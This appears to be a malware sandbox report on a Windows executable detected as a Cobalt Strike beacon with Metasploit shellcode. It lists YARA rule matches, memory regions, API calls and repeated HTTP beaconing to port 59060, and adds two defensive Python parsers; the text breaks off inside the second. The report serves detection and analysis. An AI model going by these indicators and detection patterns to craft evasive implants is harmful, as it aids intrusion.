                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE, Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE, Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE, Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE, Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE, Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE, Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                    Source: 00000000.00000002.4124981749.0000000000DE8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
                    Source: 00000000.00000002.4124981749.0000000000DE8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                    Source: Process Memory Space: 12.exe PID: 7324, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                    Source: Process Memory Space: 12.exe PID: 7324, type: MEMORYSTRMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                    Source: Process Memory Space: 12.exe PID: 7324, type: MEMORYSTRMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
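The memory-dump names in the Matched rule lines above say where each hit landed, which is the detail worth pulling out: the beacon rules fire in one region and the Metasploit API-hashing and reflective-loader rules in another. The Python below is an added example, not part of the Joe Sandbox report: it parses lines in the report's "Source: <dump>.sdmp, type: MEMORY Matched rule: <name> ..." shape (fused or spaced, as extraction leaves them), decodes the dump name into base address, page protection, state and type, groups the rule names by region, and ranks private executable regions, RWX first. The field layout of the .sdmp name (process index, stage, snapshot id, base address, protection, state, type, reserved) is an assumption inferred from the values lining up with the winnt.h constants (0x40 = PAGE_EXECUTE_READWRITE, 0x20 = PAGE_EXECUTE_READ, 0x1000 = MEM_COMMIT, 0x20000 = MEM_PRIVATE); the sample lines are trimmed copies of the ones above.

```python
import re
from dataclasses import dataclass, field

# winnt.h constants (these are certain); the .sdmp name layout they are
# matched against below is an assumption, see SDMP_RE.
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
MEM_COMMIT = 0x1000
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000

EXECUTABLE = (PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY)
PROTECT_NAMES = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
                 0x80: "PAGE_EXECUTE_WRITECOPY"}
TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

# Assumed layout: proc.stage.snapshot.base.protect.state.type.reserved.sdmp
SDMP_RE = re.compile(
    r"^[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.\d+\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<state>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp$"
)
# Accepts both "MEMORY Matched rule:" and the fused "MEMORYMatched rule:" form.
MATCH_RE = re.compile(
    r"Source:\s*(?P<src>\S+\.sdmp),\s*type:\s*MEMORY\s*Matched rule:\s*(?P<rule>\S+)"
)


@dataclass
class Region:
    base: int
    protect: int
    state: int
    mem_type: int
    rules: list = field(default_factory=list)

    def is_rwx(self) -> bool:
        return self.protect == PAGE_EXECUTE_READWRITE

    def is_private_executable(self) -> bool:
        # Committed, private (not backed by an image on disk) and executable: code the
        # Windows loader did not map from a file, the footprint of a reflectively loaded DLL.
        return (self.protect in EXECUTABLE and self.state == MEM_COMMIT
                and self.mem_type == MEM_PRIVATE)

    def describe(self) -> str:
        return (f"0x{self.base:08X} {PROTECT_NAMES.get(self.protect, hex(self.protect))} "
                f"{TYPE_NAMES.get(self.mem_type, hex(self.mem_type))} rules={len(self.rules)}")


def parse_matches(lines):
    """Group matched rule names by the memory region the match was found in."""
    regions = {}
    for line in lines:
        m = MATCH_RE.search(line)
        if not m:
            continue  # MEMORYSTR / UNPACKEDPE sources carry no region metadata
        d = SDMP_RE.match(m["src"])
        if not d:
            continue
        base = int(d["base"], 16)
        region = regions.setdefault(
            base, Region(base, int(d["protect"], 16), int(d["state"], 16), int(d["type"], 16)))
        if m["rule"] not in region.rules:
            region.rules.append(m["rule"])
    return regions


def reflective_candidates(regions):
    """Bases of private executable regions, RWX ones first, then by address."""
    cands = [r for r in regions.values() if r.is_private_executable()]
    return [r.base for r in sorted(cands, key=lambda r: (not r.is_rwx(), r.base))]


# Trimmed copies of lines from the report above (metadata after the rule name cut).
SAMPLE = """\
Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16
Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen
Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows
Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc os = windows
Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16
Source: Process Memory Space: 12.exe PID: 7324, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows
"""

if __name__ == "__main__":
    regs = parse_matches(SAMPLE.splitlines())
    for base in reflective_candidates(regs):
        print(regs[base].describe(), regs[base].rules)
```

Under that layout the report's two regions come out as 0xDB0000 (PAGE_EXECUTE_READWRITE, MEM_PRIVATE, where the beacon rules hit) ahead of 0xD70000 (PAGE_EXECUTE_READ, MEM_PRIVATE, where the Metasploit API-hashing and reflective-loader rules hit). Neither is image-backed, which is the shape you expect from a reflectively loaded beacon rather than a DLL mapped by the loader, and it is the property a memory scanner should key on before it ever looks at rule names.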
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DB41CB LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 0_2_00DB41CB
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DBA4E3 _memset,GetCurrentProcess,CreateToolhelp32Snapshot,Process32First,ProcessIdToSessionId,Process32Next, 0_2_00DBA4E3
Source: 12.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\12.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 12.exe | ReversingLabs: Detection: 94%
Source: C:\Users\user\Desktop\12.exe | Sections loaded: apphelp.dll, wininet.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, sspicli.dll, mswsock.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, iphlpapi.dll, winnsi.dll
Source: C:\Users\user\Desktop\12.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Data Obfuscation

Source: Yara match | File source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 12.exe PID: 7324, type: MEMORYSTR
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DB21D8 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00DB21D8
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DCB3E9 push ecx; ret 0_2_00DCB3FC
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DC85D0 push eax; ret 0_2_00DC85D7
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00D8A7E9 push ecx; ret 0_2_00D8A7FC
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00D88720 push dword ptr [ecx-75h]; iretd 0_2_00D88728
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00D879D0 push eax; ret 0_2_00D879D7
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DDCBE1 push FFFFFFCBh; retf 0_2_00DDCBE5
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DC9320 push dword ptr [ecx-75h]; iretd 0_2_00DC9328
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DE5D80 pushad ; retf 0_2_00DE5E79

Hooking and other Techniques for Hiding and Protection

Source: unknown | Network traffic detected: HTTP traffic on ports 49730, 49731, 49732, 49733, 49734, 49735, 49737, 49741, 49743, 49745, 49746, 49747, 49748, 49749, 49750, 49751, 49752, 49753, 49754, 49755, 49758, 49764, 49770, 49776, 49782, 49788, 49794, 49805, 49811, 49817, 49823, 49829, 49839, 49846, 49852, 49858, 49869, 49875, 49881, 49887, 49896, 49904, 49910, 49916, 49925, 49933, 49939, 49945, 49954, 49962, 49968, 49973, 49978, 49987, 49994, 50000, 50009, 50016, 50022, 50029, 50036, 50045, 50050, 50056, 50063, 50067, 50068, 50069, 50070, 50071, 50072, 50073, 50074, 50075, 50076, 50077, 50078, 50079, 50080, 50081, 50082, 50083, 50084, 50085 -> 59060 (84 connections)
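Every entry above is a separate connection from a fresh ephemeral source port to the same destination port, which is what an HTTP beacon's check-ins look like in this view. The Python below is an added example, not part of the report or of Joe Sandbox: it parses lines in the report's "Network traffic detected: HTTP traffic on port <src> -> <dst>" form, aggregates them per protocol and destination port, flags HTTP carried on a port outside a small allow-list of conventional clear-text HTTP ports, and reports how many distinct connections were made. The allow-list and the minimum-connection threshold are assumptions to tune for your environment; the sample lines are a trimmed copy of the ones above plus one constructed port-80 line as a negative case.

```python
import re
from collections import defaultdict

# Conventional clear-text HTTP ports (assumption; adjust for your environment).
EXPECTED_HTTP_PORTS = {80, 8080, 8000, 8008, 8888}
# Only flag repeated contact, so a single probe does not alert (assumed threshold).
MIN_CONNECTIONS = 5

FLOW_RE = re.compile(
    r"Network traffic detected:\s*(?P<proto>[A-Za-z0-9]+) traffic on port "
    r"(?P<sport>\d+) -> (?P<dport>\d+)"
)


def parse_flows(lines):
    """Return (protocol, source_port, destination_port) tuples, one per detected connection."""
    flows = []
    for line in lines:
        m = FLOW_RE.search(line)
        if m:
            flows.append((m["proto"], int(m["sport"]), int(m["dport"])))
    return flows


def aggregate(flows):
    """Group by (protocol, destination port), keeping source ports in report order."""
    groups = defaultdict(list)
    for proto, sport, dport in flows:
        groups[(proto, dport)].append(sport)
    return groups


def find_nonstandard_http(flows, expected=EXPECTED_HTTP_PORTS, min_conn=MIN_CONNECTIONS):
    """Destination ports that carry HTTP but are not conventional HTTP ports."""
    alerts = []
    for (proto, dport), sports in aggregate(flows).items():
        if proto.upper() != "HTTP" or dport in expected or len(sports) < min_conn:
            continue
        alerts.append({
            "dport": dport,
            "connections": len(sports),
            # One source port per connection: each check-in opened a new TCP
            # connection, nothing was reused over keep-alive.
            "distinct_source_ports": len(set(sports)),
            "source_port_span": (min(sports), max(sports)),
        })
    return sorted(alerts, key=lambda a: -a["connections"])


# Trimmed copy of the report's lines; the final port-80 line is constructed.
SAMPLE = """\
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 59060
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 59060
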